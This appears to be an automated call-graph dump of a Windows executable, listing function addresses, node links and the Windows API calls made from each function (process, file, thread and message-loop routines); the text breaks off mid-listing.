7ff6b5b7fefe 93576->93581 93579 7ff6b5b34fe7 93582 7ff6b5b2e0a8 4 API calls 93579->93582 93580->93571 93584 7ff6b5b2e0a8 4 API calls 93581->93584 93582->93571 93583 7ff6b5b2e0a8 4 API calls 93583->93589 93584->93578 93586 7ff6b5b45114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93586->93589 93587 7ff6b5b29640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93587->93589 93588 7ff6b5b450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 93588->93589 93589->93571 93589->93572 93589->93575 93589->93576 93589->93579 93589->93583 93589->93586 93589->93587 93589->93588 93590 7ff6b5b44f0c 34 API calls __scrt_initialize_thread_safe_statics 93589->93590 93625 7ff6b5b35360 300 API calls Concurrency::wait 93589->93625 93629 7ff6b5ba34e4 77 API calls 3 library calls 93589->93629 93590->93589 93616 7ff6b5b3673b memcpy_s Concurrency::wait 93591->93616 93592 7ff6b5b81fac 93595 7ff6b5b81fbe 93592->93595 93766 7ff6b5bbab30 300 API calls Concurrency::wait 93592->93766 93594 7ff6b5b36d40 9 API calls 93594->93616 93595->93589 93598 7ff6b5b36c0f 93599 7ff6b5b81fc9 93598->93599 93600 7ff6b5b36c3d 93598->93600 93767 7ff6b5ba34e4 77 API calls 3 library calls 93599->93767 93763 7ff6b5b2ee20 5 API calls Concurrency::wait 93600->93763 93604 7ff6b5b36c4a 93764 7ff6b5b41fcc 300 API calls 93604->93764 93608 7ff6b5b820c1 93617 7ff6b5b36b15 93608->93617 93770 7ff6b5ba34e4 77 API calls 3 library calls 93608->93770 93609 7ff6b5b36c78 93765 7ff6b5b3e8f4 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93609->93765 93612 7ff6b5b33c20 300 API calls 93612->93616 93613 7ff6b5b82032 93768 7ff6b5ba34e4 77 API calls 3 library calls 93613->93768 93615 7ff6b5b2e0a8 4 API calls 93615->93616 93616->93592 93616->93594 93616->93598 93616->93599 93616->93604 93616->93608 93616->93609 93616->93612 93616->93613 93616->93615 93616->93617 93631 7ff6b5bbf160 93616->93631 93636 7ff6b5bbf0ac 93616->93636 93639 7ff6b5ba7e48 93616->93639 93673 7ff6b5ba63dc 93616->93673 93678 7ff6b5ba8ea0 93616->93678 93711 7ff6b5ba8e98 93616->93711 93744 7ff6b5ba5b80 93616->93744 93750 7ff6b5b44c68 93616->93750 93756 7ff6b5b45114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93616->93756 93757 7ff6b5b2ec00 93616->93757 93762 7ff6b5b450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93616->93762 93769 7ff6b5bb8d98 49 API calls Concurrency::wait 93616->93769 93617->93589 93625->93589 93626->93564 93627->93567 93628->93589 93629->93589 93630->93574 93771 7ff6b5bbf630 93631->93771 93633 7ff6b5bbf182 93634 7ff6b5bbf1cd 93633->93634 93839 7ff6b5b2ee20 5 API calls Concurrency::wait 93633->93839 93634->93616 93637 7ff6b5bbf630 164 API calls 93636->93637 93638 7ff6b5bbf0c2 93637->93638 93638->93616 93640 7ff6b5ba7e79 93639->93640 93671 7ff6b5ba7f55 Concurrency::wait 93640->93671 93916 7ff6b5b29640 93640->93916 93642 7ff6b5ba7ea6 93644 7ff6b5b29640 4 API calls 93642->93644 93646 7ff6b5ba7eaf 93644->93646 93648 7ff6b5b2d4cc 48 API calls 93646->93648 93647 7ff6b5b2d4cc 48 API calls 93649 7ff6b5ba7fab 93647->93649 93650 7ff6b5ba7ebe 93648->93650 93900 7ff6b5b26838 93649->93900 93919 7ff6b5b274ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 93650->93919 93654 7ff6b5ba7ed8 93920 7ff6b5b27c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 93654->93920 93655 7ff6b5ba7fbe GetLastError 93657 7ff6b5ba7fd8 93655->93657 93665 7ff6b5ba7fe5 93657->93665 93923 7ff6b5b27ab8 93657->93923 93658 7ff6b5ba7f07 93658->93671 93921 7ff6b5b9bdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 93658->93921 93659 7ff6b5ba7ff5 93660 7ff6b5b29640 4 API calls 93659->93660 93663 7ff6b5ba8035 93660->93663 93663->93665 93926 7ff6b5b90d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93663->93926 93664 7ff6b5ba7f17 93666 7ff6b5ba7f1b 93664->93666 93664->93671 93665->93616 93668 7ff6b5b2ec00 4 API calls 93666->93668 93669 7ff6b5ba7f28 93668->93669 93922 7ff6b5b9bab8 8 API calls Concurrency::wait 93669->93922 93671->93665 93891 7ff6b5b2834c 93671->93891 93672 7ff6b5ba7f31 Concurrency::wait 93672->93671 93674 7ff6b5b2d4cc 48 API calls 93673->93674 93675 7ff6b5ba63f8 93674->93675 93946 7ff6b5b9bdec 93675->93946 93677 7ff6b5ba6404 93677->93616 93679 7ff6b5baa680 93678->93679 93680 7ff6b5b2834c 5 API calls 93679->93680 93681 7ff6b5baa71a 93679->93681 93682 7ff6b5baa6be 93680->93682 93683 7ff6b5baa7fd 93681->93683 93684 7ff6b5baa6f3 93681->93684 93691 7ff6b5baa770 93681->93691 93685 7ff6b5b2d4cc 48 API calls 93682->93685 93985 7ff6b5ba1864 6 API calls 93683->93985 93684->93616 93687 7ff6b5baa6d0 93685->93687 93688 7ff6b5b26838 16 API calls 93687->93688 93690 7ff6b5baa6e2 93688->93690 93689 7ff6b5baa805 93694 7ff6b5b9b334 4 API calls 93689->93694 93690->93681 93692 7ff6b5baa6e6 93690->93692 93693 7ff6b5b2d4cc 48 API calls 93691->93693 93692->93684 93695 7ff6b5b27ab8 CloseHandle 93692->93695 93700 7ff6b5baa778 93693->93700 93710 7ff6b5baa7e0 Concurrency::wait 93694->93710 93695->93684 93696 7ff6b5baa7ee 93954 7ff6b5b9b3a8 93696->93954 93697 7ff6b5baa7a7 93972 7ff6b5b298e8 93697->93972 93700->93696 93700->93697 93701 7ff6b5baa7b5 93704 7ff6b5b2e0a8 4 API calls 93701->93704 93702 7ff6b5b28314 CloseHandle 93703 7ff6b5baa85c 93702->93703 93703->93684 93706 7ff6b5b27ab8 CloseHandle 93703->93706 93705 7ff6b5baa7c2 93704->93705 93975 7ff6b5b271f8 93705->93975 93706->93684 93708 7ff6b5baa7d3 93709 7ff6b5b9b3a8 12 API calls 93708->93709 93709->93710 93710->93684 93710->93702 93712 7ff6b5baa680 93711->93712 93713 7ff6b5b2834c 5 API calls 93712->93713 93718 7ff6b5baa71a 93712->93718 93714 7ff6b5baa6be 93713->93714 93716 7ff6b5b2d4cc 48 API calls 93714->93716 93715 7ff6b5baa7fd 93999 7ff6b5ba1864 6 API calls 93715->93999 93720 7ff6b5baa6d0 93716->93720 93718->93715 93719 7ff6b5baa6f3 93718->93719 93724 7ff6b5baa770 93718->93724 93719->93616 93721 7ff6b5b26838 16 API calls 93720->93721 93723 7ff6b5baa6e2 93721->93723 93722 7ff6b5baa805 93727 7ff6b5b9b334 4 API calls 93722->93727 93723->93718 93725 7ff6b5baa6e6 93723->93725 93726 7ff6b5b2d4cc 48 API calls 93724->93726 93725->93719 93728 7ff6b5b27ab8 CloseHandle 93725->93728 93733 7ff6b5baa778 93726->93733 93743 7ff6b5baa7e0 Concurrency::wait 93727->93743 93728->93719 93729 7ff6b5baa7ee 93731 7ff6b5b9b3a8 12 API calls 93729->93731 93730 7ff6b5baa7a7 93732 7ff6b5b298e8 4 API calls 93730->93732 93731->93743 93734 7ff6b5baa7b5 93732->93734 93733->93729 93733->93730 93737 7ff6b5b2e0a8 4 API calls 93734->93737 93735 7ff6b5b28314 CloseHandle 93736 7ff6b5baa85c 93735->93736 93736->93719 93739 7ff6b5b27ab8 CloseHandle 93736->93739 93738 7ff6b5baa7c2 93737->93738 93740 7ff6b5b271f8 4 API calls 93738->93740 93739->93719 93741 7ff6b5baa7d3 93740->93741 93742 7ff6b5b9b3a8 12 API calls 93741->93742 93742->93743 93743->93719 93743->93735 93746 7ff6b5ba5ba5 93744->93746 93745 7ff6b5ba5ba9 93745->93616 93746->93745 93747 7ff6b5ba5be5 FindClose 93746->93747 93748 7ff6b5ba5bd5 93746->93748 93747->93745 93748->93745 93749 7ff6b5b27ab8 CloseHandle 93748->93749 93749->93745 93753 7ff6b5b44c2c 93750->93753 93751 7ff6b5b44c50 93751->93616 93753->93750 93753->93751 94000 7ff6b5b4925c EnterCriticalSection LeaveCriticalSection _invalid_parameter_noinfo 93753->94000 94001 7ff6b5b45600 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 93753->94001 94002 7ff6b5b45620 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 93753->94002 93758 7ff6b5b2ec1d 93757->93758 93759 7ff6b5b7a5a2 93758->93759 93760 7ff6b5b44c68 4 API calls 93758->93760 93761 7ff6b5b2ec55 memcpy_s 93760->93761 93761->93616 93763->93604 93764->93609 93765->93609 93766->93595 93767->93617 93768->93617 93769->93616 93770->93617 93773 7ff6b5bbf671 __scrt_fastfail 93771->93773 93840 7ff6b5b2d4cc 93773->93840 93776 7ff6b5bbf759 93777 7ff6b5bbf840 93776->93777 93778 7ff6b5bbf762 93776->93778 93780 7ff6b5bbf87d GetCurrentDirectoryW 93777->93780 93783 7ff6b5b2d4cc 48 API calls 93777->93783 93779 7ff6b5b2d4cc 48 API calls 93778->93779 93781 7ff6b5bbf777 93779->93781 93782 7ff6b5b44c68 4 API calls 93780->93782 93785 7ff6b5b2e330 4 API calls 93781->93785 93786 7ff6b5bbf8a7 GetCurrentDirectoryW 93782->93786 93784 7ff6b5bbf85c 93783->93784 93787 7ff6b5b2e330 4 API calls 93784->93787 93788 7ff6b5bbf783 93785->93788 93789 7ff6b5bbf8b5 93786->93789 93790 7ff6b5bbf868 93787->93790 93791 7ff6b5b2d4cc 48 API calls 93788->93791 93792 7ff6b5bbf8f0 93789->93792 93872 7ff6b5b3f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93789->93872 93790->93780 93790->93792 93793 7ff6b5bbf798 93791->93793 93797 7ff6b5bbf901 93792->93797 93798 7ff6b5bbf905 93792->93798 93795 7ff6b5b2e330 4 API calls 93793->93795 93799 7ff6b5bbf7a4 93795->93799 93796 7ff6b5bbf8d0 93873 7ff6b5b3f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93796->93873 93805 7ff6b5bbfa0f CreateProcessW 93797->93805 93806 7ff6b5bbf972 93797->93806 93875 7ff6b5b9fddc 8 API calls 93798->93875 93802 7ff6b5b2d4cc 48 API calls 93799->93802 93807 7ff6b5bbf7b9 93802->93807 93803 7ff6b5bbf8e0 93874 7ff6b5b3f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93803->93874 93804 7ff6b5bbf90e 93876 7ff6b5b9fca8 8 API calls 93804->93876 93838 7ff6b5bbf9b4 93805->93838 93878 7ff6b5b8d1f8 99 API calls 93806->93878 93809 7ff6b5b2e330 4 API calls 93807->93809 93812 7ff6b5bbf7c5 93809->93812 93814 7ff6b5bbf806 GetSystemDirectoryW 93812->93814 93816 7ff6b5b2d4cc 48 API calls 93812->93816 93813 7ff6b5bbf926 93877 7ff6b5b9fafc 8 API calls ~SyncLockT 93813->93877 93818 7ff6b5b44c68 4 API calls 93814->93818 93819 7ff6b5bbf7e1 93816->93819 93817 7ff6b5bbf94f 93817->93797 93820 7ff6b5bbf830 GetSystemDirectoryW 93818->93820 93822 7ff6b5b2e330 4 API calls 93819->93822 93820->93789 93821 7ff6b5bbfabe CloseHandle 93824 7ff6b5bbfaf5 93821->93824 93825 7ff6b5bbfacc 93821->93825 93823 7ff6b5bbf7ed 93822->93823 93823->93789 93823->93814 93826 7ff6b5bbfafe 93824->93826 93830 7ff6b5bbfb26 CloseHandle 93824->93830 93879 7ff6b5b9f7dc 93825->93879 93835 7ff6b5bbfaa3 93826->93835 93828 7ff6b5bbfa64 93831 7ff6b5bbfa84 GetLastError 93828->93831 93830->93835 93831->93835 93863 7ff6b5b9f51c 93835->93863 93838->93821 93838->93828 93839->93634 93841 7ff6b5b2d50b 93840->93841 93842 7ff6b5b2d4f2 93840->93842 93843 7ff6b5b2d53e 93841->93843 93844 7ff6b5b2d513 93841->93844 93859 7ff6b5b2e330 93842->93859 93845 7ff6b5b79cc4 93843->93845 93847 7ff6b5b2d550 93843->93847 93854 7ff6b5b79bbc 93843->93854 93884 7ff6b5b4956c 31 API calls 93844->93884 93887 7ff6b5b49538 31 API calls 93845->93887 93885 7ff6b5b44834 46 API calls 93847->93885 93849 7ff6b5b2d522 93853 7ff6b5b2ec00 4 API calls 93849->93853 93851 7ff6b5b79cdc 93853->93842 93855 7ff6b5b44c68 4 API calls 93854->93855 93858 7ff6b5b79c3e Concurrency::wait wcscpy 93854->93858 93856 7ff6b5b79c0a 93855->93856 93857 7ff6b5b2ec00 4 API calls 93856->93857 93857->93858 93886 7ff6b5b44834 46 API calls 93858->93886 93860 7ff6b5b2e342 93859->93860 93861 7ff6b5b44c68 4 API calls 93860->93861 93862 7ff6b5b2e361 wcscpy 93861->93862 93862->93776 93864 7ff6b5b9f7dc CloseHandle 93863->93864 93865 7ff6b5b9f52a 93864->93865 93888 7ff6b5b9f7b8 93865->93888 93868 7ff6b5b9f7b8 ~SyncLockT CloseHandle 93869 7ff6b5b9f53c 93868->93869 93870 7ff6b5b9f7b8 ~SyncLockT CloseHandle 93869->93870 93871 7ff6b5b9f545 93870->93871 93871->93633 93872->93796 93873->93803 93874->93792 93875->93804 93876->93813 93877->93817 93878->93838 93880 7ff6b5b9f7b8 ~SyncLockT CloseHandle 93879->93880 93881 7ff6b5b9f7ee 93880->93881 93882 7ff6b5b9f7b8 ~SyncLockT CloseHandle 93881->93882 93883 7ff6b5b9f7f7 93882->93883 93884->93849 93885->93849 93886->93845 93887->93851 93889 7ff6b5b9f533 93888->93889 93890 7ff6b5b9f7c9 CloseHandle 93888->93890 93889->93868 93890->93889 93892 7ff6b5b44c68 4 API calls 93891->93892 93893 7ff6b5b28363 93892->93893 93927 7ff6b5b28314 93893->93927 93896 7ff6b5b29640 4 API calls 93897 7ff6b5b28378 93896->93897 93898 7ff6b5b28314 CloseHandle 93897->93898 93899 7ff6b5b28380 93898->93899 93899->93647 93901 7ff6b5b28314 CloseHandle 93900->93901 93902 7ff6b5b2685a 93901->93902 93903 7ff6b5b6caa8 93902->93903 93904 7ff6b5b2687d CreateFileW 93902->93904 93905 7ff6b5b6caae CreateFileW 93903->93905 93913 7ff6b5b268d9 93903->93913 93909 7ff6b5b268ab 93904->93909 93906 7ff6b5b6cae6 93905->93906 93905->93909 93932 7ff6b5b26a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 93906->93932 93908 7ff6b5b6caf3 93908->93909 93915 7ff6b5b268e4 93909->93915 93930 7ff6b5b268f4 9 API calls 93909->93930 93911 7ff6b5b268c1 93911->93913 93931 7ff6b5b26a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 93911->93931 93913->93915 93933 7ff6b5b9b334 93913->93933 93915->93655 93915->93659 93917 7ff6b5b44c68 4 API calls 93916->93917 93918 7ff6b5b29663 93917->93918 93918->93642 93919->93654 93920->93658 93921->93664 93922->93672 93941 7ff6b5b282e4 93923->93941 93926->93665 93928 7ff6b5b2833d CloseHandle 93927->93928 93929 7ff6b5b2832a 93927->93929 93928->93929 93929->93896 93930->93911 93931->93913 93932->93908 93936 7ff6b5b9b188 93933->93936 93937 7ff6b5b9b193 93936->93937 93938 7ff6b5b9b19c WriteFile 93936->93938 93940 7ff6b5b9b208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 93937->93940 93938->93915 93940->93938 93942 7ff6b5b28314 CloseHandle 93941->93942 93943 7ff6b5b282f2 Concurrency::wait 93942->93943 93944 7ff6b5b28314 CloseHandle 93943->93944 93945 7ff6b5b28303 93944->93945 93949 7ff6b5b9c7c0 lstrlenW 93946->93949 93950 7ff6b5b9bdf5 93949->93950 93951 7ff6b5b9c7dd GetFileAttributesW 93949->93951 93950->93677 93951->93950 93952 7ff6b5b9c7eb FindFirstFileW 93951->93952 93952->93950 93953 7ff6b5b9c7ff FindClose 93952->93953 93953->93950 93955 7ff6b5b9b3c8 93954->93955 93956 7ff6b5b9b42a 93954->93956 93957 7ff6b5b9b41e 93955->93957 93958 7ff6b5b9b3d0 93955->93958 93959 7ff6b5b9b334 4 API calls 93956->93959 93993 7ff6b5b9b458 8 API calls 93957->93993 93961 7ff6b5b9b3f1 93958->93961 93962 7ff6b5b9b3dd 93958->93962 93963 7ff6b5b9b410 Concurrency::wait 93959->93963 93991 7ff6b5b2a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93961->93991 93989 7ff6b5b2a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93962->93989 93963->93710 93966 7ff6b5b9b3e2 93990 7ff6b5b44120 6 API calls 93966->93990 93967 7ff6b5b9b3f6 93992 7ff6b5b9b270 6 API calls 93967->93992 93970 7ff6b5b9b3ef 93986 7ff6b5b9b384 93970->93986 93973 7ff6b5b44c68 4 API calls 93972->93973 93974 7ff6b5b29918 93973->93974 93974->93701 93976 7ff6b5b6cd0c 93975->93976 93977 7ff6b5b2721c 93975->93977 93982 7ff6b5b44c68 4 API calls 93976->93982 93978 7ff6b5b27274 93977->93978 93980 7ff6b5b6cd66 memcpy_s 93977->93980 93994 7ff6b5b2b960 93978->93994 93983 7ff6b5b44c68 4 API calls 93980->93983 93981 7ff6b5b27283 memcpy_s 93981->93708 93982->93980 93984 7ff6b5b6cdda memcpy_s 93983->93984 93985->93689 93987 7ff6b5b9b334 4 API calls 93986->93987 93988 7ff6b5b9b399 93987->93988 93988->93963 93989->93966 93990->93970 93991->93967 93992->93970 93993->93963 93995 7ff6b5b2b976 memcpy_s 93994->93995 93996 7ff6b5b2b981 93994->93996 93995->93981 93997 7ff6b5b44c68 4 API calls 93996->93997 93998 7ff6b5b6ef2a 93996->93998 93997->93995 93999->93722 94000->93753 94002->93753 94003 7ff6b5b7e263 94004 7ff6b5b7e271 94003->94004 94014 7ff6b5b32680 94003->94014 94004->94004 94005 7ff6b5b329c8 PeekMessageW 94005->94014 94006 7ff6b5b326da GetInputState 94006->94005 94006->94014 94008 7ff6b5b7d181 TranslateAcceleratorW 94008->94014 94009 7ff6b5b32a1f TranslateMessage DispatchMessageW 94010 7ff6b5b32a33 PeekMessageW 94009->94010 94010->94014 94011 7ff6b5b328b9 timeGetTime 94011->94014 94012 7ff6b5b7d2bb timeGetTime 94036 7ff6b5b42ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94012->94036 94014->94005 94014->94006 94014->94008 94014->94009 94014->94010 94014->94011 94014->94012 94018 7ff6b5b366c0 300 API calls 94014->94018 94019 7ff6b5b33c20 300 API calls 94014->94019 94020 7ff6b5b32856 94014->94020 94021 7ff6b5ba34e4 77 API calls 94014->94021 94023 7ff6b5b32b70 94014->94023 94030 7ff6b5b42de8 94014->94030 94035 7ff6b5b32e30 300 API calls 2 library calls 94014->94035 94037 7ff6b5ba3a28 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94014->94037 94038 7ff6b5bba320 300 API calls Concurrency::wait 94014->94038 94018->94014 94019->94014 94021->94014 94024 7ff6b5b32ba9 94023->94024 94025 7ff6b5b32b96 94023->94025 94059 7ff6b5ba34e4 77 API calls 3 library calls 94024->94059 94039 7ff6b5b32050 94025->94039 94027 7ff6b5b32b9e 94027->94014 94029 7ff6b5b7e55c 94031 7ff6b5b42e0d 94030->94031 94033 7ff6b5b42e2a 94030->94033 94031->94014 94032 7ff6b5b42e5b IsDialogMessageW 94032->94031 94032->94033 94033->94031 94033->94032 94034 7ff6b5b89d94 GetClassLongPtrW 94033->94034 94034->94032 94034->94033 94035->94014 94036->94014 94037->94014 94038->94014 94040 7ff6b5b33c20 300 API calls 94039->94040 94050 7ff6b5b320a8 94040->94050 94041 7ff6b5b3212d 94041->94027 94042 7ff6b5b7d06f 94064 7ff6b5ba34e4 77 API calls 3 library calls 94042->94064 94044 7ff6b5b7d08d 94045 7ff6b5b32552 94046 7ff6b5b44c68 4 API calls 94045->94046 94056 7ff6b5b323cb memcpy_s 94046->94056 94047 7ff6b5b7d036 94062 7ff6b5b2ee20 5 API calls Concurrency::wait 94047->94062 94049 7ff6b5b44c68 4 API calls 94055 7ff6b5b322a5 memcpy_s 94049->94055 94050->94041 94050->94042 94050->94045 94051 7ff6b5b32244 94050->94051 94050->94055 94050->94056 94051->94056 94060 7ff6b5b31ce4 301 API calls Concurrency::wait 94051->94060 94052 7ff6b5b7d062 94063 7ff6b5b2ee20 5 API calls Concurrency::wait 94052->94063 94055->94049 94055->94056 94056->94047 94057 7ff6b5ba34e4 77 API calls 94056->94057 94061 7ff6b5b24a60 300 API calls 94056->94061 94057->94056 94059->94029 94060->94055 94061->94056 94062->94052 94063->94042 94064->94044 94065 7ff6b5b7b221 94066 7ff6b5b7b22a 94065->94066 94073 7ff6b5b30378 94065->94073 94088 7ff6b5b947bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94066->94088 94068 7ff6b5b7b241 94089 7ff6b5b94708 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94068->94089 94070 7ff6b5b7b264 94071 7ff6b5b33c20 300 API calls 94070->94071 94072 7ff6b5b7b292 94071->94072 94079 7ff6b5b30405 94072->94079 94090 7ff6b5bb8d98 49 API calls Concurrency::wait 94072->94090 94082 7ff6b5b2f7b8 94073->94082 94076 7ff6b5b7b2d9 Concurrency::wait 94076->94073 94091 7ff6b5b947bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94076->94091 94080 7ff6b5b3070a 94079->94080 94081 7ff6b5b2e0a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94079->94081 94092 7ff6b5b2ee20 5 API calls Concurrency::wait 94079->94092 94081->94079 94086 7ff6b5b2f7d5 94082->94086 94083 7ff6b5b2f7de 94083->94079 94084 7ff6b5b29640 4 API calls 94084->94086 94085 7ff6b5b2e0a8 4 API calls 94085->94086 94086->94083 94086->94084 94086->94085 94087 7ff6b5b2f7b8 4 API calls 94086->94087 94087->94086 94088->94068 94089->94070 94090->94076 94091->94076 94092->94079 94093 7ff6b5b490e0 94100 7ff6b5b5af30 94093->94100 94095 7ff6b5b490e5 94096 7ff6b5b5ba10 _isindst LeaveCriticalSection 94095->94096 94097 7ff6b5b490f0 94096->94097 94098 7ff6b5b490fc 94097->94098 94099 7ff6b5b49118 11 API calls 94097->94099 94099->94098 94105 7ff6b5b5b778 35 API calls 3 library calls 94100->94105 94102 7ff6b5b5af3b 94106 7ff6b5b5b26c 35 API calls abort 94102->94106 94105->94102 94107 7ff6b5b45328 94130 7ff6b5b44cac 94107->94130 94110 7ff6b5b45474 94162 7ff6b5b457e4 7 API calls __scrt_fastfail 94110->94162 94111 7ff6b5b45344 94113 7ff6b5b4547e 94111->94113 94115 7ff6b5b45362 94111->94115 94163 7ff6b5b457e4 7 API calls __scrt_fastfail 94113->94163 94116 7ff6b5b45387 94115->94116 94120 7ff6b5b453a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 94115->94120 94138 7ff6b5b5ada4 94115->94138 94117 7ff6b5b45489 abort 94119 7ff6b5b4540d 94145 7ff6b5b45930 94119->94145 94120->94119 94159 7ff6b5b49204 35 API calls FindHandlerForForeignException 94120->94159 94122 7ff6b5b45412 94148 7ff6b5b23730 94122->94148 94127 7ff6b5b45435 94127->94117 94161 7ff6b5b44e90 8 API calls 2 library calls 94127->94161 94129 7ff6b5b4544c 94129->94116 94131 7ff6b5b44cce __scrt_initialize_crt 94130->94131 94164 7ff6b5b465ec 94131->94164 94134 7ff6b5b44cd7 94134->94110 94134->94111 94139 7ff6b5b5adff 94138->94139 94140 7ff6b5b5ade0 94138->94140 94139->94120 94140->94139 94213 7ff6b5b21064 94140->94213 94218 7ff6b5b210e8 94140->94218 94223 7ff6b5b21080 94140->94223 94228 7ff6b5b21048 94140->94228 94446 7ff6b5b46240 94145->94446 94149 7ff6b5b237a3 94148->94149 94150 7ff6b5b23743 IsThemeActive 94148->94150 94160 7ff6b5b45974 GetModuleHandleW 94149->94160 94448 7ff6b5b492d0 94150->94448 94156 7ff6b5b2377d 94460 7ff6b5b237b0 94156->94460 94158 7ff6b5b23785 SystemParametersInfoW 94158->94149 94159->94119 94160->94127 94161->94129 94162->94113 94163->94117 94165 7ff6b5b465f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 94164->94165 94177 7ff6b5b47290 94165->94177 94169 7ff6b5b4660c 94171 7ff6b5b44cd3 94169->94171 94184 7ff6b5b472d8 DeleteCriticalSection 94169->94184 94171->94134 94172 7ff6b5b5ac84 94171->94172 94173 7ff6b5b64340 94172->94173 94174 7ff6b5b44ce0 94173->94174 94201 7ff6b5b5dd2c 94173->94201 94174->94134 94176 7ff6b5b46620 8 API calls 3 library calls 94174->94176 94176->94134 94178 7ff6b5b47298 94177->94178 94180 7ff6b5b472c9 94178->94180 94182 7ff6b5b465ff 94178->94182 94185 7ff6b5b47614 94178->94185 94190 7ff6b5b472d8 DeleteCriticalSection 94180->94190 94182->94171 94183 7ff6b5b47218 8 API calls 3 library calls 94182->94183 94183->94169 94184->94171 94191 7ff6b5b47310 94185->94191 94188 7ff6b5b4765f InitializeCriticalSectionAndSpinCount 94189 7ff6b5b47654 94188->94189 94189->94178 94190->94182 94192 7ff6b5b47371 94191->94192 94199 7ff6b5b4736c try_get_function 94191->94199 94192->94188 94192->94189 94193 7ff6b5b473a0 LoadLibraryExW 94194 7ff6b5b473c1 GetLastError 94193->94194 94193->94199 94194->94199 94195 7ff6b5b47462 GetProcAddress 94197 7ff6b5b47473 94195->94197 94196 7ff6b5b47454 94196->94192 94196->94195 94197->94192 94198 7ff6b5b47439 FreeLibrary 94198->94199 94199->94192 94199->94193 94199->94196 94199->94198 94200 7ff6b5b473fb LoadLibraryExW 94199->94200 94200->94199 94212 7ff6b5b5b9bc EnterCriticalSection 94201->94212 94203 7ff6b5b5dd3c 94204 7ff6b5b5e258 32 API calls 94203->94204 94205 7ff6b5b5dd45 94204->94205 94206 7ff6b5b5db44 34 API calls 94205->94206 94211 7ff6b5b5dd53 94205->94211 94208 7ff6b5b5dd4e 94206->94208 94207 7ff6b5b5ba10 _isindst LeaveCriticalSection 94209 7ff6b5b5dd5f 94207->94209 94210 7ff6b5b5dc30 GetStdHandle GetFileType 94208->94210 94209->94173 94210->94211 94211->94207 94233 7ff6b5b27ec0 94213->94233 94215 7ff6b5b2106d 94269 7ff6b5b44ebc 34 API calls _onexit 94215->94269 94217 7ff6b5b44f15 94217->94140 94338 7ff6b5b41d80 94218->94338 94222 7ff6b5b44f15 94222->94140 94363 7ff6b5b27920 94223->94363 94225 7ff6b5b2109e 94393 7ff6b5b44ebc 34 API calls _onexit 94225->94393 94227 7ff6b5b44f15 94227->94140 94427 7ff6b5b27718 94228->94427 94232 7ff6b5b44f15 94232->94140 94270 7ff6b5b282b4 94233->94270 94236 7ff6b5b282b4 4 API calls 94237 7ff6b5b27f3a 94236->94237 94238 7ff6b5b29640 4 API calls 94237->94238 94239 7ff6b5b27f46 94238->94239 94277 7ff6b5b27cf4 94239->94277 94241 7ff6b5b27f59 94287 7ff6b5b42d5c 6 API calls 94241->94287 94243 7ff6b5b27fa5 94244 7ff6b5b29640 4 API calls 94243->94244 94245 7ff6b5b27fb1 94244->94245 94246 7ff6b5b29640 4 API calls 94245->94246 94247 7ff6b5b27fbd 94246->94247 94248 7ff6b5b29640 4 API calls 94247->94248 94249 7ff6b5b27fc9 94248->94249 94250 7ff6b5b29640 4 API calls 94249->94250 94251 7ff6b5b2800f 94250->94251 94252 7ff6b5b29640 4 API calls 94251->94252 94253 7ff6b5b280f7 94252->94253 94288 7ff6b5b3ef88 94253->94288 94255 7ff6b5b28103 94295 7ff6b5b3eec8 94255->94295 94257 7ff6b5b2812f 94258 7ff6b5b29640 4 API calls 94257->94258 94259 7ff6b5b2813b 94258->94259 94306 7ff6b5b36d40 94259->94306 94263 7ff6b5b281ac 94264 7ff6b5b281be GetStdHandle 94263->94264 94265 7ff6b5b28220 OleInitialize 94264->94265 94266 7ff6b5b6d350 94264->94266 94265->94215 94323 7ff6b5b9ffc8 CreateThread 94266->94323 94268 7ff6b5b6d367 CloseHandle 94269->94217 94271 7ff6b5b29640 4 API calls 94270->94271 94272 7ff6b5b282c6 94271->94272 94273 7ff6b5b29640 4 API calls 94272->94273 94274 7ff6b5b282cf 94273->94274 94275 7ff6b5b29640 4 API calls 94274->94275 94276 7ff6b5b27f2e 94275->94276 94276->94236 94278 7ff6b5b6d2c8 94277->94278 94279 7ff6b5b27d0d 94277->94279 94325 7ff6b5b2dda4 94278->94325 94282 7ff6b5b27d24 94279->94282 94285 7ff6b5b27d51 94279->94285 94281 7ff6b5b6d2d3 94324 7ff6b5b27e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94282->94324 94284 7ff6b5b27d2f memcpy_s 94284->94241 94285->94281 94286 7ff6b5b44c68 4 API calls 94285->94286 94286->94284 94287->94243 94289 7ff6b5b29640 4 API calls 94288->94289 94290 7ff6b5b3efa3 94289->94290 94291 